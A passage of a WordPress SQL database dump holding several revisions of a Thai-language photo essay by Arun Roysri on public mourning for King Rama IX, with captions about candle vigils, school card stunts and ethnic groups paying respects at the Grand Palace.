ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /></h3>\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:16:08', '2018-11-12 07:16:08', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4383, 3, '2018-11-12 14:19:35', '2018-11-12 07:19:35', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:19:35', '2018-11-12 07:19:35', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4384, 3, '2018-11-12 14:20:44', '2018-11-12 07:20:44', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว 